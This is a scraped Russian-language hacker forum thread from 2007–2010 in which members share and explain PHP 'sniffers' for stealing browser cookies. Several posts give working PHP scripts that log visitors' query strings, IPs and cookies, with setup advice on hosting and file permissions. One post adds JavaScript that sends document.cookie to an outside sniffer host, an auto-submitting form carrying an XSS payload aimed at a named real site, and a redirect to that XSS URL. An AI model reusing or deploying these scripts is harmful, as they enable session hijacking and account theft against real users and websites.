php sniffers

Discussion in 'PHP' started by ettee, 4 Aug 2007.

  1. ettee

    ettee Administrator
    Staff Member

    Joined:
    12 Oct 2006
    Messages:
    466
    Likes Received:
    1,034
    Reputations:
    1,065
    Tontonq's Cookie Sniffer v4.0
    Sniffer Script [Powered by SPG]
    V-team sniffer
    Pro Hack sniffer [by loader]
    php Based Sniffer [phpBS] v2.xx © Kanick 2005 Модифицирован АНТИЧАТ.РУ
    php Based Sniffer 4.1 Personal © Kanick
    Spy Image 2.0

    PHP:
    <?php 
     $date
    =date("[D|d/m/Y|H:i]"); 
     
    $ip=getenv("Remote_addr"); 
     
    $real_ip=getenv("HTTP_X_FORWARDED_FOR"); 
     
    $otkuda=getenv("HTTP_REFERER"); 
     
    $browser=getenv("HTTP_USER_AGENT"); 
     
    $win=getenv("windir"); 
     
    $uid=implode($argv," "); 
     
    //Открытие файла лога и запись в него данных, закрытие лога 
     
    $fp=fopen("log.txt","a"); 
     
    fputs($fp,"$datet|$uid|t$ip($real_ip)t$browsert$otkudat$winn"); 
     
    fclose($fp); 
     
    ?>  
    PHP:
    <?
    $snif[] = date("d.m.Y H:i"); // дата
    $snif[] = $_SERVER['REMOTE_ADDR']; // айпишник юзверя
    @$snif[] = $_SERVER['HTTP_REFERER']; // рефер
    @$snif[] = $_SERVER['QUERY_STRING']; // переданные параметру снифферу
    $snif[] = $_SERVER['HTTP_USER_AGENT'];  // агент юзверя =)
    $file "file.txt"// файл в который будут записаны данные
    $s fopen($file,"a+");
    @
    $sa fread ($s,filesize($file));
    $fp fopen($file,"w");
    foreach (
    $snif as $sniffed)
    {
    fwrite($fp,"\n".$sniffed);
    }
    fwrite($fp,"\n");
    fwrite($s,$sa);
    fclose($s);
    fclose($fp);
    ?> 
     
    _________________________
    #1 ettee, 4 Aug 2007
    Last edited: 17 Aug 2007
    2 people like this.
  2. xaker-boss

    xaker-boss Elder - Старейшина

    Joined:
    6 Mar 2007
    Messages:
    251
    Likes Received:
    49
    Reputations:
    -11
    Люди извеняюсь, ктонебуть потскажите какой из этих php sniffers лучше? и как им воспользоватся?
     
  3. biophreak

    biophreak Elder - Старейшина

    Joined:
    3 Aug 2007
    Messages:
    348
    Likes Received:
    63
    Reputations:
    15
    Сложно сказать, какой лучше - все зависит от твоих нужд...
    Если просто побаловаться - то советую сниферы от каника...
    Если для редиректа или ифрейминга, то , ИМХО как можно проще(всмысле без наваротов) и с удобным выводом логов )))

    ЗЗЫЖ А топикстартеру респект!
     
  4. xaker-boss

    xaker-boss Elder - Старейшина

    Joined:
    6 Mar 2007
    Messages:
    251
    Likes Received:
    49
    Reputations:
    -11
    Я скачал php Based Sniffer [phpBS] v2.xx © Kanick 2005 Модифицирован АНТИЧАТ.РУ
    кто может обясните как его настроить и как запустить ?
     
  5. Kaban

    Kaban Elder - Старейшина

    Joined:
    19 Mar 2006
    Messages:
    248
    Likes Received:
    78
    Reputations:
    14
    тебе нужен хостинг с поддержкой PHP.
    s.gif - сам сниффер
    log.php - просмотр логов
    i.gif - картинка возращаемая браузеру! есле нет возврашаеться 1 пиксель
    незабудь поставить CHMOD на data.txt - 666
     
    1 person likes this.
  6. biophreak

    biophreak Elder - Старейшина

    Joined:
    3 Aug 2007
    Messages:
    348
    Likes Received:
    63
    Reputations:
    15
    В log.php, если нужна авторизация:
    $user = false; - измени на "юзер" - в кавычках
    $passwd = false; - измение на "пароль" - в кавычках
    И поменяй $auth = false; на true
    И в страницу, на которой надо снифать - заинклудь файл s.gif

    ЗЫЖ Вроде все правильно, если что не так - не ругай, ибо со сниферами дело не имел в виду ненадобности! :)
     
    1 person likes this.
  7. nonamez

    nonamez Elder - Старейшина

    Joined:
    22 Jul 2007
    Messages:
    628
    Likes Received:
    283
    Reputations:
    17
    подскажите снифер,который нормально сохраняет ссылку,по которой переходят
     
    1 person likes this.
  8. SSSetuPPP

    SSSetuPPP Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    55
    Likes Received:
    4
    Reputations:
    0
    Не понял

    "незабудь поставить CHMOD на data.txt - 666" - Это как?
     
  9. mR_LiNK[deface_0nl

    mR_LiNK[deface_0nl Elder - Старейшина

    Joined:
    12 Dec 2006
    Messages:
    147
    Likes Received:
    27
    Reputations:
    13
    Права на доступ к 'data.txt'
    '666' - права на чтение и запись (для всех групп пользователей)

    ЗЫ: 2Ettee -> зря здесь поместил, над было в полезные скрипты подшить!)
     
    #9 mR_LiNK[deface_0nl, 16 Oct 2007
    Last edited: 16 Oct 2007
  10. .:EnoT:.

    .:EnoT:. Сексуальное чудовище

    Joined:
    29 May 2007
    Messages:
    803
    Likes Received:
    559
    Reputations:
    50
    не нравится мне сниффер Каника, не знаю почему, имхо лучше свой написать...там писать то нечего пару строк кода, зато запросто можно под свои нужды подстроить, что-то добавить, что-то убрать да и самому приятно ;)
     
  11. biophreak

    biophreak Elder - Старейшина

    Joined:
    3 Aug 2007
    Messages:
    348
    Likes Received:
    63
    Reputations:
    15
    Товарищ, извиняюсь конечно, но от вас видна одна только критика...
    Как говорица - не нравится, не юзай! (ничего личного)
     
  12. Zitt

    Zitt Elder - Старейшина

    Joined:
    7 May 2006
    Messages:
    738
    Likes Received:
    270
    Reputations:
    59
    s.netsec.ru - лучший снифер =)
     
  13. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    673
    Likes Received:
    357
    Reputations:
    44
    sniff1.php - Простейший пример снифера для cookie на PHP
    sniff2.php - Самый простой пример отсылки cookie на снифер по адресу http://sniff/sniff
    sniff3.php - Пример автоматической "переадресации" пользователя на страницу с посылкой POST параметров
    sniff4.php - PHP скрипт редиректа на заXSSенную страничку

    1.

    PHP:
    <?
    if(
    strlen($QUERY_STRING)<2)exit;
    header("Content-Type: image/png");
    $im=ImageCreate(11);
    ImagePNG($im);
    imagedestroy($im);

    $fp=fopen("sniff.txt""a");

    fputs($fp,$QUERY_STRING."\n\n");
    fclose($fp);
    ?>
    2.

    PHP:
    <script language=JavaScript>
    document.images[0].src="http://sniff/sniff?"+document.cookie
    </script>

    3.

    PHP:
    <html>  <body onload="s.submit();">  <form name=s action=http://soft.mail.ru method=POST>  <input type=hidden name=words value='" style=background:url(javascript:alert(document.cookie)) "'>  </form>  </body>  </html>
    4.

    PHP:
     <?  header("Location: http://soft.mail.ru/search_result_header.php?qs=1&words=%22+style%3Dbackground%3Aurl%28javascript%3Aalert%28document.cookie%29%29+%22")  ?> 
     

    PHP:

    <?php
    if(isset($QUERY_STRING))
    {
      
    $datedate('d.m.y : H:i:s');
      
    $fp fopen("./slg.txt""a");
      
    fputs($fp,"Date and Tiime: $date\n IP: $REMOTE_ADDR\n Refer: $HTTP_REFER\n Cookie: $QUERY_STRING\n Agent: $HTTP_USER_AGENT\n Host: $HTTP_HOST Server: $SERVER_PORT Script: $SCRIPT_NAME\n Method: $REQUEST_METHOD\n ");
      
    fclose($fp);
    }
     
    ?>
     
    #13 ~!DoK_tOR!~, 10 Nov 2007
    Last edited: 10 Nov 2007
    1 person likes this.
  14. DarkMaster

    DarkMaster New Member

    Joined:
    17 Apr 2010
    Messages:
    28
    Likes Received:
    1
    Reputations:
    0
    ссылки в первом посте давно умерли. Может у кого сохранились файлы? Выложите для изучения, плиз.